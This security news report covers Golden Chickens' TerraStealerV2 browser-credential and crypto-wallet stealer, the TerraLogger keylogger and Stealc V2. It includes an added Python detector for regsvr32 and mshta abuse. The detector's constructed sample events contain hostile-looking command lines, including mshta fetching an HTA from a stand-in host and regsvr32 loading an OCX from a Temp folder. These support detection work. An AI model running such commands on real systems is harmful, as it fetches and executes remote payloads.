Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data

Malware steals browser credentials and cryptocurrency wallet data

The threat actors known as Golden Chickens have been attributed to two new malware families called TerraStealerV2 and TerraLogger, suggesting continued development efforts to adapt and diversify their arsenal.

"TerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information," Recorded Future's Insikt Group said. "TerraLogger, by contrast, is a standalone keylogger. It uses a common low-level keyboard hook to record keystrokes and writes the logs to local files."

Golden Chickens, also known as Venom Spider, is the name given to a financially motivated threat actor associated with a notorious malware family called More_eggs. It is known to have been active since at least 2018, offering its wares under a malware-as-a-service (MaaS) model.

Since 2023, Golden Chickens has been attributed to a persona known as badbullzvenom, which is believed to be jointly operated by individuals from Canada and Romania. Some of the other malicious tools developed by the e-crime group include More_eggs Lite (aka lite_more_eggs), VenomLNK, TerraLoader, and TerraCrypt.

At the end of last year, Zscaler ThreatLabz detailed new activity linked to Golden Chickens involving a backdoor called RevC2 and a loader called Venom Loader, both delivered via VenomLNK.

The latest findings from Recorded Future show that the threat actors continue to iterate on their offering, releasing an updated version of their malware that can harvest data from browsers, cryptocurrency wallets, and browser extensions.

TerraStealerV2 is distributed in various formats, such as executable files, dynamic-link libraries (DLL), Windows Installer packages (MSI), and shortcut (LNK) files.

In all these cases, the payload is delivered in the form of an OCX file (short for Microsoft's OLE Control Extension), which is downloaded from an external domain ("wetransfers[.]io").

"Although it targets the Chrome database to steal credentials, it does not bypass the Application Bound Encryption (ABE) protections introduced in Chrome updates after July 2024, indicating the malware is either outdated or still under development," the cybersecurity company said.

Data captured by TerraStealerV2 is exfiltrated to both Telegram and the domain "wetransfers[.]io". The malware also uses trusted Windows utilities, such as regsvr32.exe and mshta.exe, to evade detection.
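The abuse of regsvr32.exe and mshta.exe described above is visible in process-creation telemetry. As an added illustration (not code from the article or from Recorded Future's report), the following Python classifier flags these two utilities when they are handed a remote URL or an .ocx file sitting in a user-writable location; the sample events, paths and the `malicious.example` domain are constructed, and the parent-process rule (explorer.exe for LNK launches, msiexec.exe for MSI installs) is an assumption used only to enrich an existing hit.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal Sysmon EID 1 style process-creation record (constructed)."""
    image: str
    command_line: str
    parent_image: str


LOLBINS = {"regsvr32.exe", "mshta.exe"}
REMOTE_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
OCX_RE = re.compile(r"[^\s\"']+\.ocx\b", re.IGNORECASE)
# User-writable drop locations a downloaded payload typically lands in (assumption).
USER_WRITABLE_RE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata|downloads)|programdata|windows\\temp)\\",
    re.IGNORECASE)
# Parents consistent with a shortcut (LNK) or installer (MSI) delivery chain (assumption).
DELIVERY_PARENTS = {"explorer.exe", "msiexec.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list:
    """Return the detection reasons for one event; an empty list means not suspicious."""
    if basename(ev.image) not in LOLBINS:
        return []
    reasons = []
    if REMOTE_URL_RE.search(ev.command_line):
        reasons.append("remote-url")
    ocx = OCX_RE.search(ev.command_line)
    if ocx and USER_WRITABLE_RE.search(ocx.group(0)):
        reasons.append("ocx-from-user-writable-path")
    # The parent alone is too noisy to alert on; record it only to enrich a real hit.
    if reasons and basename(ev.parent_image) in DELIVERY_PARENTS:
        reasons.append("parent-" + basename(ev.parent_image))
    return reasons


def scan(events):
    """Return (image, reasons) for every event that triggered at least one rule."""
    return [(basename(e.image), classify(e)) for e in events if classify(e)]


SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\update.ocx",
                 r"C:\Windows\System32\msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://malicious.example/launcher.hta",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
                 r"C:\Windows\explorer.exe"),
]
```

Running `scan(SAMPLE_EVENTS)` reports the first two events and ignores the legitimate regsvr32 registration of a System32 DLL.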

TerraLogger, also delivered as an OCX file, is engineered to record keystrokes. However, it does not include functionality to exfiltrate data or communicate with command-and-control (C2) infrastructure, suggesting that it is either in early development or intended to be used in combination with another component of the Golden Chickens MaaS ecosystem.

"The current state of TerraStealerV2 and TerraLogger suggests that both tools remain under active development and do not yet exhibit the level of stealth typically associated with mature Golden Chickens tooling," Recorded Future said.

"Given Golden Chickens' history of developing malware for credential theft and access, these capabilities will likely continue to evolve."

The disclosure comes amid the emergence of new stealer malware families, Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer, which are designed to siphon a wide range of sensitive information from victims.

It also follows the discovery of an updated version of the Stealc malware with support for a streamlined command-and-control (C2) communication protocol and added RC4 encryption.

"Malware delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts," Zscaler ThreatLabz said in a report published last week.

"The redesigned control panel provides an integrated builder that allows payload rules based on hardware IDs and installed software. Additional features include screenshot capture across screens and unified file collection."

The new version 2.2.4 (aka Stealc V2) was introduced in March 2025 and has been observed being distributed via another loader called Amadey. The control panel also supports Telegram bot integration for sending notifications and allows the message format to be customized.

"Stealc V2 introduces improvements such as enhanced payload delivery, a structured communication protocol with encryption, and a redesigned control panel that streamlines information collection," Zscaler said.

2025-05-05 08:39:00
